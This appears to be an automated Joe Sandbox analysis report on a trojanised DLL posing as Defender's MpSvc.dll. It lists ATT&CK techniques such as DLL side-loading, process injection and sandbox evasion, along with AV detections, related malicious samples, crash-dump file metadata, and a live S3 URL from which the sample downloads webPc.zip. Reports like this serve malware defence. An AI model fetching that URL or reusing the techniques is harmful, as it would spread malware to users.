Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 5_2_00B50308 GetVersion,

5_2_00B50308

Source: Amcache.hve.8.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Masquerading	OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	111 Process Injection	11 Virtualization/Sandbox Evasion	LSASS Memory	11 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	111 Process Injection	Security Account Manager	1 Account Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Rundll32	Cached Domain Credentials	23 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
appdata -MpSvc.dll	47%	ReversingLabs	Win32.Trojan.Generic
appdata -MpSvc.dll	100%	Avira	HEUR/AGEN.1338333
appdata -MpSvc.dll	100%	Joe Sandbox ML

Name	IP	Active	Malicious	Antivirus Detection	Reputation
s3-r-w.sa-east-1.amazonaws.com	3.5.233.174	true	false		high
awsserver903203232.s3.sa-east-1.amazonaws.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://awsserver903203232.s3.sa-east-1.amazonaws.com/webPc.zip	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://awsserver903203232.s3.sa-east-1.amazonaws.com/r	rundll32.exe, 0000000B.00000002.2285349012.00000000007C9000.00000004.00000020.00020000.00000000.sdmp	false	high
http://upx.sf.net	Amcache.hve.8.dr	false	high
https://awsserver903203232.s3.sa-east-1.amazonaws.com/webPc.zip5pV	rundll32.exe, 0000000B.00000002.2285349012.000000000077F000.00000004.00000020.00020000.00000000.sdmp	false	high
http://www.delphiforfun.org/openU	rundll32.exe, 00000005.00000002.2149493533.0000000000B5C000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000B.00000002.2286542223.000000000427C000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000C.00000002.3365361806.000000000041C000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000D.00000002.2231907043.000000000041C000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2233331173.000000000447C000.00000020.00000001.01000000.00000003.sdmp, appdata -MpSvc.dll	false	high
https://awsserver903203232.s3.sa-east-1.amazonaws.com/webPc.zipx	rundll32.exe, 0000000B.00000002.2285349012.00000000007E0000.00000004.00000020.00020000.00000000.sdmp	false	high
http://www.delphiforfun.org/	rundll32.exe	false	high
https://awsserver903203232.s3.sa-east-1.amazonaws.com/.	rundll32.exe, 0000000B.00000002.2285349012.00000000007C9000.00000004.00000020.00020000.00000000.sdmp	false	high
https://awsserver903203232.s3.sa-east-1.amazonaws.com/webPc.zipC	rundll32.exe, 0000000B.00000002.2285349012.0000000000792000.00000004.00000020.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
3.5.233.174	s3-r-w.sa-east-1.amazonaws.com	United States		16509	AMAZON-02US	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1405581
Start date and time:	2024-03-08 19:42:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 54s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	appdata -MpSvc.dll
Detection:	MAL
Classification:	mal72.evad.winDLL@26/17@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .dll

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.21
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: appdata -MpSvc.dll

Simulations

Behavior and APIs

Time	Type	Description
19:43:05	API Interceptor	4x Sleep call for process: WerFault.exe modified
19:43:10	API Interceptor	1x Sleep call for process: loaddll32.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s3-r-w.sa-east-1.amazonaws.com	00023948209303294#U00ac320302282349843984903.exe	Get hash	malicious	Unknown	Browse	3.5.232.137
	00023948209303294#U00ac320302282349843984903.exe	Get hash	malicious	Unknown	Browse	16.12.1.14
	0219830219301290321012notas.exe	Get hash	malicious	Unknown	Browse	3.5.232.21
	0219830219301290321012notas.exe	Get hash	malicious	Unknown	Browse	3.5.234.1
	0923840932020004-3-0.exe	Get hash	malicious	Unknown	Browse	3.5.232.185
	WKYC506_2389030007-00901003007010_777380775_#U00b2.exe	Get hash	malicious	Unknown	Browse	52.95.163.114
	WKYC506_2389030007-00901003007010_777380775_#U00b2.exe	Get hash	malicious	Unknown	Browse	16.12.0.34
	DOC7186723912#U0370.msi	Get hash	malicious	Hidden Macro 4.0	Browse	52.95.164.60
	DOC0974045396#U0370.msi	Get hash	malicious	Hidden Macro 4.0	Browse	52.95.164.98
	file.msi	Get hash	malicious	Hidden Macro 4.0	Browse	52.95.164.11

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	saoJLnjLcC.elf	Get hash	malicious	Unknown	Browse	34.249.145.219
	ZAYIMfNGS6.elf	Get hash	malicious	Unknown	Browse	34.249.145.219
	j9JVfEt8Il.elf	Get hash	malicious	Unknown	Browse	34.254.182.186
	http://mydpd.space/	Get hash	malicious	DCRat, PureLog Stealer	Browse	99.84.203.3
	https://www.hiclipart.com/free-transparent-background-png-clipart-zjdjz/download	Get hash	malicious	Unknown	Browse	13.226.225.59
	http://67833.vip	Get hash	malicious	Phisher	Browse	18.244.214.32
	FW Attention New Incoming D0CS for Live-quinn on.eml	Get hash	malicious	HTMLPhisher	Browse	52.43.182.179
	https://www.trade-schools-directory.com/redir/coquredir.htm?page=college&type=popular&pos=82&dest=//gamma.app/public/This-project-proposal-aims-to-address-the-challenges-and-deliver--4tlhyfwlb1pvqx4	Get hash	malicious	Unknown	Browse	3.132.246.63
	https://www.trade-schools-directory.com/redir/coquredir.htm?page=college&type=popular&pos=82&dest=//gamma.app/public/This-project-proposal-aims-to-address-the-challenges-and-deliver--4tlhyfwlb1pvqx4	Get hash	malicious	Unknown	Browse	13.226.210.22
	https://cosoc.com/generatorsystems	Get hash	malicious	Unknown	Browse	18.154.132.63

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	http://mydpd.space/	Get hash	malicious	DCRat, PureLog Stealer	Browse	3.5.233.174
	https://www.hiclipart.com/free-transparent-background-png-clipart-zjdjz/download	Get hash	malicious	Unknown	Browse	3.5.233.174
	Kontrolforanstaltningens31.wsf	Get hash	malicious	GuLoader, XWorm	Browse	3.5.233.174
	file.exe	Get hash	malicious	Clipboard Hijacker, RisePro Stealer	Browse	3.5.233.174
	SecuriteInfo.com.Win32.PWSX-gen.10639.26376.exe	Get hash	malicious	AgentTesla	Browse	3.5.233.174
	20240306 The new order about PO#PW225084YL.50L of 23AW1203A285 2ND SAMPLE ENR xls.bat.exe	Get hash	malicious	GuLoader	Browse	3.5.233.174
	Re Remittance Advice.exe	Get hash	malicious	AgentTesla	Browse	3.5.233.174
	PO 02-2311-55R-MAP- 7Mar2024-19th Order-Euro38217- URGENT ORDER solutions -RK.exe	Get hash	malicious	AgentTesla	Browse	3.5.233.174
	SecuriteInfo.com.Unwanted-Program.0056626f1.515.26855.exe	Get hash	malicious	Unknown	Browse	3.5.233.174
	SecuriteInfo.com.Win32.PWSX-gen.6931.14638.exe	Get hash	malicious	AgentTesla	Browse	3.5.233.174

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_355bab52f43c26f3ad8297a4de7f404df9f67_7522e4b5_ec744cce-c1f8-4219-a518-c8fd2849091d\Report.wer

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1525405310603927
Encrypted:	false
SSDEEP:	192:wainOtgb0BU/wjeT9IkA3fzuiFcZ24IO8dci:JiOtgoBU/wjeSfzuiFcY4IO8dci
MD5:	44904A3EC34D9E2A2A129CDF3AAE4AE4
SHA1:	3B3A6A89F4DB8DAF0BED4FCC55A4F2248B2A2F1F
SHA-256:	4DAFF3DADDBCFDFF66039AE47759B87CB52EB39CBFA34FDF110066FE16938FA1
SHA-512:	97ACECB0D79BC9D4A4F05F2CF9FE8A130E71A04C7C23D469DA381D0A4BE5E8B32DA15374BE489D2D2BFE59125D746564D431A435EEF9C7CDB57618DDA845557D
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.4.3.9.6.9.9.4.8.5.3.2.5.8.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.4.3.9.6.9.9.8.0.0.9.5.1.0.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.c.7.4.4.c.c.e.-.c.1.f.8.-.4.2.1.9.-.a.5.1.8.-.c.8.f.d.2.8.4.9.0.9.1.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.d.4.0.1.9.e.4.-.b.7.a.3.-.4.c.b.9.-.a.c.4.d.-.0.d.a.d.5.1.a.7.c.b.2.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.b.4.-.0.0.0.1.-.0.0.1.5.-.8.8.f.1.-.1.8.7.8.8.8.7.1.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.f.a.8.8.9.e.4.5.6.a.a.6.4.6.a.4.d.0.a.4.3.4.9.9.7.7.4.3.0.c.e.5.f.a.5.e.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_b65f38bb695cc2977d7b7916d954e2041a58188_7522e4b5_d4bbab8c-3edc-4e3d-b7d7-c984a778d02e\Report.wer

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9170958825611729
Encrypted:	false
SSDEEP:	192:hAoLiSOrKL20BU/wjeTdIwzuiFtZ24IO84ci:TLizGLdBU/wjeLzuiFtY4IO84ci
MD5:	A765B1B78AF0690279A30E7D48E02E81
SHA1:	28BC4BF38978D44D04C935811C5E48C0BC89B129
SHA-256:	2575D77250348AF1F83643DC2AF31D03A6A0328A74A417A95D6A80A2C2618272
SHA-512:	BF73BE51342711A0DCB4CF59597EEC123AB37CCE3273F9C4B888A02CE1177E564C75556C447462A40C3FCCF748306D5F088147FCB0115BA4AA666108387E472F
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.4.3.9.6.9.9.1.4.7.4.1.4.3.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.4.3.9.6.9.9.2.3.9.6.0.2.1.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.4.b.b.a.b.8.c.-.3.e.d.c.-.4.e.3.d.-.b.7.d.7.-.c.9.8.4.a.7.7.8.d.0.2.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.e.4.5.1.1.4.4.-.0.b.3.1.-.4.a.7.9.-.8.6.9.1.-.e.6.1.c.3.e.e.1.a.e.c.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.e.4.-.0.0.0.1.-.0.0.1.5.-.9.e.f.a.-.3.1.7.8.8.8.7.1.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.f.a.8.8.9.e.4.5.6.a.a.6.4.6.a.4.d.0.a.4.3.4.9.9.7.7.4.3.0.c.e.5.f.a.5.e.2.d.7.!.r.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_b65f38bb695cc2977d7b7916d954e2041a58188_7522e4b5_e6931509-32b6-4124-879e-56126e9ec3c9\Report.wer

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9172594172316787
Encrypted:	false
SSDEEP:	192:NjHGi2OcL20BU/wjeTdDBzuiFtZ24IO84ci:NjGi3cLdBU/wjezzuiFtY4IO84ci
MD5:	28878CD6540D2150442D58F010887523
SHA1:	22C87F64BB0E01FF4F87183FF932F76A6493A96C
SHA-256:	C194F7FB546E30C9363CB46BC98F20C12CDF3D505F4F3A0337EF91ECDB9AEEFD
SHA-512:	343D51A17D3D011FFE071137253ADE39BEB4E6365741E96B2F322D5F6A3291F03357F8D3B6E222BA79C9F33744B7C9DDF4FEA8C5A4CDDD1496FA6B01AEF50401
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.4.3.9.6.9.8.2.0.2.9.3.6.9.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.4.3.9.6.9.8.2.8.5.7.4.9.6.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.6.9.3.1.5.0.9.-.3.2.b.6.-.4.1.2.4.-.8.7.9.e.-.5.6.1.2.6.e.9.e.c.3.c.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.f.a.5.2.7.2.7.-.3.2.f.6.-.4.0.a.b.-.b.0.7.5.-.b.1.c.1.7.e.8.9.0.7.c.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.3.8.-.0.0.0.1.-.0.0.1.5.-.3.6.4.2.-.a.7.7.2.8.8.7.1.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.f.a.8.8.9.e.4.5.6.a.a.6.4.6.a.4.d.0.a.4.3.4.9.9.7.7.4.3.0.c.e.5.f.a.5.e.2.d.7.!.r.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_e81442412364774a5aff9775d4f5b6b39b9b16_7522e4b5_65f5f910-60aa-4d12-9b4d-3af6e8e902b7\Report.wer

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9119464709949463
Encrypted:	false
SSDEEP:	192:IhirOIZw0BU/wjeTdIwzuiFtZ24IO8dci:aiy+LBU/wjeLzuiFtY4IO8dci
MD5:	FDC794FF6E77D0958FF93C270E35C035
SHA1:	C43FC3FDDCD46A7F5E45F5272B5C8374D033AB61
SHA-256:	08C6DC577BBBEA30DCA38D0060AEB26402F5CAD617545E17E8F26B7F888BFDE7
SHA-512:	35A06335C36B51CC0C7B2F59B345389EE8435BAD2BB11171D58125A498218656D54F5F1AEBA6448E4D508A90E5A7A432C187053E0958017F833383E89777BE74
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.4.3.9.6.9.9.1.5.7.5.4.8.8.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.4.3.9.6.9.9.2.4.8.1.7.2.5.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.5.f.5.f.9.1.0.-.6.0.a.a.-.4.d.1.2.-.9.b.4.d.-.3.a.f.6.e.8.e.9.0.2.b.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.2.4.c.0.7.f.4.-.3.5.9.2.-.4.a.7.a.-.9.0.c.6.-.9.8.e.d.2.7.c.6.b.5.c.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.1.5.8.-.0.0.0.1.-.0.0.1.5.-.f.d.6.7.-.2.8.7.8.8.8.7.1.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.f.a.8.8.9.e.4.5.6.a.a.6.4.6.a.4.d.0.a.4.3.4.9.9.7.7.4.3.0.c.e.5.f.a.5.e.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7839.tmp.dmp

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Mar 8 18:43:02 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	52848
Entropy (8bit):	1.7884544586418907
Encrypted:	false
SSDEEP:	192:wJBL07WXAMO5H4kfNbQWJ4TDrI2twWeg2CR:TRD5HBJ4Txt3R
MD5:	F8CDE89B3821E8ACBD416AA063D05018
SHA1:	C1EC0F0BCA123E8DFE76139F95F51CAE0FE6D9E8
SHA-256:	8BF50EA868CB2FF7D01AC3E60961971596EEB9B759240CF2F066C41A495AA17E
SHA-512:	6BE95E159820ACF6233CF03496E2578C0C0E7A352D3E59F5C88499EAF4D14557610815EACD1D308492102029D3A525EA58BD21BAECA7EA9FCC739C4142141A23
Malicious:	false
Preview:	MDMP..a..... .......6\.e........................(...............4/..........T.......8...........T......................................................................................................................eJ......x.......GenuineIntel............T.......8...5\.e.............................0..1...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7A2E.tmp.WERInternalMetadata.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8340
Entropy (8bit):	3.6884924087717716
Encrypted:	false
SSDEEP:	192:R6l7wVeJSD6RL6YR863gmf8Ao5N5prp89bZjsf8sTm:R6lXJm6N6Yq63gmf8AoOZIf81
MD5:	7FE4C794B3F4C79F4D016EF9D6B0AB05
SHA1:	579F15AE7ECC5AFE1535A5A9720EAF3EC6CF05AB
SHA-256:	B887883D89B3F659BD3C54911425FDA1CBF247AFCC7A3FE5F1E3B134336FE2A4
SHA-512:	46F34AC1CD52733DDBBC388BA37E5663CE885C3B5C86F3F7984BF4A34B81ED79029086CDA5F11225F0FF9A71CB9E073A3912D98190DDA0BEFB97968F3EF7F1E4
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.3.3.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7A6E.tmp.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4759
Entropy (8bit):	4.447713654394558
Encrypted:	false
SSDEEP:	48:cvIwWl8zszJg77aI9m5WpW8VYEYm8M4JCdPvdFJ+q8vjPvvUGScSxd:uIjfNI7II7V4JGKbUJ3xd
MD5:	01984F2030F046B0BCE69144A37244E2
SHA1:	1826BA609A6B10A66620941FE2A48102397129AD
SHA-256:	98BDA81E68CE0D00B14B63F78B5559C93144471A7E5275B33851842E8BC3F88B
SHA-512:	3AA688D454A89860921C7AB70CB9810AEFE68AA95A0BFD06EA50757FED006FD2E26E340CAB57E5F836C6533A9B7847D2A996033F287C0831DB2B3D65A12D5D68
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="226665" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D17.tmp.dmp

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Mar 8 18:43:11 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	44736
Entropy (8bit):	1.927349339650594
Encrypted:	false
SSDEEP:	192:p6l3rM2XLcmO5H4h2P4Pk2bzpqOCZ02dHP:0Qx5HS2P41bzpqOroP
MD5:	5267AC0CD751E00DF4665F5649F59BBC
SHA1:	DB666B2F6D66D21C855AA4C7B1FA2FB425A5E55B
SHA-256:	78128F1F2C75417CA0A0D2BF67722DA436569F1EEFE5B06C62CEEC682B1581EE
SHA-512:	DF48ADF3C12A821AE6EE67838CB194425E922A671D0C45695E80E25B78A3D9C221E384D86C674C60C591CAA9F57AFAE6C62C5EA600A8D1501C5CCF6E51418752
Malicious:	false
Preview:	MDMP..a..... .......?\.e........................(...............8,..........T.......8...........T...........@...........................................................................................................eJ......H.......GenuineIntel............T...........>\.e.............................0..1...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D94.tmp.dmp

Process:	C:\Windows\SysWOW64\WerFault.exe
